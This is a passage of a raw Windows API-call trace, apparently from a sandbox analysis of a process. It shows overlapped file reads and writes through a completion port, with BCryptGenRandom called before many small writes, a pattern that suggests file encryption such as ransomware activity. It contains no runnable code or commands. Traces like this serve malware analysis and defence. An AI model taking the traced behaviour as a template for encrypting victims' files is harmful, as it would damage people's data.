nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.101] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.103] WriteFile (in: hFile=0x3bc, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1a7f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.144] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x4f7a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.153] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.170] CloseHandle (hObject=0x3bc) returned 1 [0082.170] free (_Block=0x1fb18c0) [0082.170] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.207] CloseHandle (hObject=0x3c4) returned 1 [0082.208] free (_Block=0x3d70048) [0082.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.219] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.236] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x12ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.258] ReadFile (in: hFile=0x3ac, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.356] CloseHandle (hObject=0x3b4) returned 1 [0082.356] free (_Block=0x1ff1e60) [0082.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.374] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.374] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.385] CloseHandle (hObject=0x3c4) returned 1 [0082.385] free (_Block=0x3d70048) [0082.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.399] ReadFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0xb05, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.413] CloseHandle (hObject=0x3b8) returned 1 [0082.413] free (_Block=0x2031ed0) [0082.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.432] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x183b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.435] CloseHandle (hObject=0x3c4) returned 1 [0082.435] free (_Block=0x3d70048) [0082.438] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.439] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.439] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.450] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xc3a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.451] CloseHandle (hObject=0x3b8) returned 1 [0082.452] free (_Block=0x1fb18c0) [0082.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.475] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.476] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.476] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.476] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.476] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.477] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.477] free (_Block=0x77d800) [0082.477] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.477] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.477] free (_Block=0x1ff1930) [0082.477] free (_Block=0x1ff1a40) [0082.477] free (_Block=0x77d908) [0082.477] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.492] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.493] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.493] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.500] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.500] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.500] free (_Block=0x77d800) [0082.500] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.501] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.501] free (_Block=0x1ff1930) [0082.501] free (_Block=0x1ff1a40) [0082.501] free (_Block=0x77d908) [0082.501] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.515] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.516] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.520] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.520] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.520] free (_Block=0x77d800) [0082.520] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.520] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.521] free (_Block=0x1ff1930) [0082.521] free (_Block=0x1ff1a40) [0082.521] free (_Block=0x77d908) [0082.521] WriteFile (in: hFile=0x3c4, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.535] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.536] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.536] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.540] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.540] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.540] free (_Block=0x77d800) [0082.540] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.540] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.540] free (_Block=0x1ff1930) [0082.540] free (_Block=0x1ff1a40) [0082.540] free (_Block=0x77d908) [0082.540] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.952] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0082.952] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.952] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0082.956] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.956] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.956] free (_Block=0x77d800) [0082.956] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0082.957] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0082.957] free (_Block=0x2071f40) [0082.957] free (_Block=0x2072050) [0082.957] free (_Block=0x77d908) [0082.957] WriteFile (in: hFile=0x3b8, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.973] CloseHandle (hObject=0x3c4) returned 1 [0082.974] free (_Block=0x1ff1e60) [0082.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0082.989] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.990] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.386] CloseHandle (hObject=0x3a0) returned 1 [0087.387] free (_Block=0x3d70048) [0087.387] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.405] CloseHandle (hObject=0x3ac) returned 1 [0087.483] free (_Block=0x3df0008) [0087.638] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.733] WriteFile (in: hFile=0x3b8, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0087.733] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.755] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7011c, nNumberOfBytesToRead=0x11da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8 | out: lpBuffer=0x3e7011c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e700e8) returned 1 [0087.773] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.788] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xca59, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.807] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.820] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.821] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0087.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.821] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0087.825] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.825] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.825] free (_Block=0x77d800) [0087.825] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.825] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.826] free (_Block=0x1ff1930) [0087.826] free (_Block=0x1ff1a40) [0087.826] free (_Block=0x77d908) [0087.826] WriteFile (in: hFile=0x3c0, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0087.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0087.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0087.846] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.846] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.846] free (_Block=0x77d800) [0087.846] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0087.846] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0087.846] free (_Block=0x3db00b8) [0087.846] free (_Block=0x3db01c8) [0087.846] free (_Block=0x77d908) [0087.846] WriteFile (in: hFile=0x3c8, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0087.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0087.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0087.864] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.864] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.864] free (_Block=0x77d800) [0087.864] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.864] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.864] free (_Block=0x1ff1930) [0087.864] free (_Block=0x1ff1a40) [0087.864] free (_Block=0x77d908) [0087.865] WriteFile (in: hFile=0x3ac, lpBuffer=0x3eb00ac*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0078 | out: lpBuffer=0x3eb00ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3eb0078) returned 1 [0087.865] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0087.880] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.880] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.880] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0087.880] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.881] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.881] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0087.881] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0087.881] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0087.881] free (_Block=0x77d800) [0087.881] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0087.882] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0087.882] free (_Block=0x1ff1930) [0087.882] free (_Block=0x1ff1a40) [0087.882] free (_Block=0x77d908) [0087.882] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.883] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, 